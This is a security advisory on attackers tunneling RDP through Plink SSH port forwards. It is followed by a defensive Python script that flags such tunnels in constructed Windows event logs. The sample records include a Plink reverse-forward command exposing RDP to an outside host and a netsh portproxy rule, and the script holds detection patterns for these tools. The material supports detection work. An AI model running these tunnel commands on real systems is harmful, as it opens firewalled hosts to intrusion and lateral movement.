Threat Actors are Bypassing Network Protections via RDP Tunneling

A Microsoft Windows component, Remote Desktop Protocol (RDP), provides administrators and users with remote access to systems. Threat actors are bypassing network protections by combining RDP utilities, network tunneling and host-based port forwarding, taking advantage of ports left open in the network’s firewall. Threat actors are using PuTTY Link, or Plink, for inbound RDP tunneling, which lets them establish SSH network connections to other systems. Using these tactics, they can move laterally into segmented networks through an administrative jump box without disrupting legitimate administrators, which makes these intrusions and attacks difficult to detect. The NJCCIC recommends reviewing and applying the host-based and network-based prevention and detection mechanisms described in the FireEye blog post on this topic.
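As an added defender-side example, not part of the NJCCIC advisory or the FireEye post it references, the script below runs two host-based checks over constructed Windows event records: an RDP logon (logon type 10) whose source address is a loopback address, which is what an SSH or netsh port forward delivering RDP to the host from itself looks like in the Security log, and a process-creation command line that starts a Plink/PuTTY port forward or adds a netsh portproxy rule. The JSON-per-line record shape, the host names, user names, addresses and command lines are all constructed for the example.

```python
"""Flag indicators of RDP tunneling in constructed Windows event records.

Checks performed (assumptions of this example, not the advisory's own list):
  1. Security event 4624 with LogonType 10 (RemoteInteractive) whose source
     address is loopback (127.0.0.0/8 or ::1). A genuine remote desktop
     session never originates from the host itself; a local SSH port forward
     or netsh portproxy does exactly that.
  2. Security event 4688 whose command line starts a tunnel: plink/putty with
     a -R, -L or -D port-forward flag, or 'netsh interface portproxy add'.
"""
import ipaddress
import json
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample records (not real telemetry); one JSON object per line.
SAMPLE_LOG = r"""
{"EventID": 4624, "Computer": "JUMPBOX01", "LogonType": 10, "TargetUserName": "svc_admin", "IpAddress": "10.20.30.40"}
{"EventID": 4624, "Computer": "JUMPBOX01", "LogonType": 10, "TargetUserName": "svc_admin", "IpAddress": "127.0.0.2"}
{"EventID": 4624, "Computer": "FS02", "LogonType": 3, "TargetUserName": "backup", "IpAddress": "127.0.0.1"}
{"EventID": 4688, "Computer": "JUMPBOX01", "NewProcessName": "C:\\Users\\Public\\plink.exe", "CommandLine": "plink.exe -ssh -R 12345:127.0.0.1:3389 user@198.51.100.7"}
{"EventID": 4688, "Computer": "JUMPBOX01", "NewProcessName": "C:\\Windows\\System32\\netsh.exe", "CommandLine": "netsh interface portproxy add v4tov4 listenport=8001 connectport=3389 connectaddress=10.0.0.5"}
{"EventID": 4688, "Computer": "WS07", "NewProcessName": "C:\\Program Files\\PuTTY\\putty.exe", "CommandLine": "putty.exe -ssh admin@10.0.0.9"}
"""

Finding = Tuple[str, str, str]  # (rule name, computer, detail)

# Binary name is matched case-insensitively; the forward flag is case-sensitive
# so that plink's lowercase '-l <user>' (login name) does not trip the rule.
TUNNEL_CMD_PATTERNS = [
    (re.compile(r"(?i:\b(?:plink|putty)(?:\.exe)?\b).*\s-[RLD]\s"),
     "SSH port forward via PuTTY/Plink"),
    (re.compile(r"(?i:\bnetsh(?:\.exe)?\b.*\binterface\s+portproxy\s+add\b)"),
     "netsh portproxy forward"),
]


def parse_event(line: str) -> Dict:
    """Parse one JSON-per-line record into a dict."""
    return json.loads(line)


def is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1; False for anything unparseable."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def check_rdp_logon(ev: Dict) -> Optional[Finding]:
    """Rule 1: RemoteInteractive logon sourced from the host itself."""
    if ev.get("EventID") == 4624 and ev.get("LogonType") == 10 \
            and is_loopback(str(ev.get("IpAddress", ""))):
        return ("rdp_logon_from_loopback", ev["Computer"],
                f"{ev.get('TargetUserName')} from {ev['IpAddress']}")
    return None


def check_tunnel_process(ev: Dict) -> Optional[Finding]:
    """Rule 2: process creation whose command line sets up a port forward."""
    if ev.get("EventID") != 4688:
        return None
    cmd = ev.get("CommandLine", "")
    for pattern, label in TUNNEL_CMD_PATTERNS:
        if pattern.search(cmd):
            return ("tunnel_process_started", ev["Computer"], f"{label}: {cmd}")
    return None


def analyze(log_text: str) -> List[Finding]:
    """Run both checks over every record and collect the findings in order."""
    findings: List[Finding] = []
    for raw in log_text.strip().splitlines():
        line = raw.strip()
        if not line:
            continue
        ev = parse_event(line)
        for check in (check_rdp_logon, check_tunnel_process):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for rule, host, detail in analyze(SAMPLE_LOG):
        print(f"[{rule}] {host}: {detail}")
```

Run against the sample, the loopback-sourced RDP logon on JUMPBOX01 and the two tunnel-setup command lines are reported, while the legitimate RDP session from 10.20.30.40, the network logon from 127.0.0.1 (logon type 3, not RDP) and the plain interactive PuTTY session are not. In production the same two rules map onto Security 4624/4688 (or Sysmon process-creation) telemetry collected centrally, and the loopback check is only meaningful on hosts where RDP is expected to arrive from the network rather than from a local forwarder.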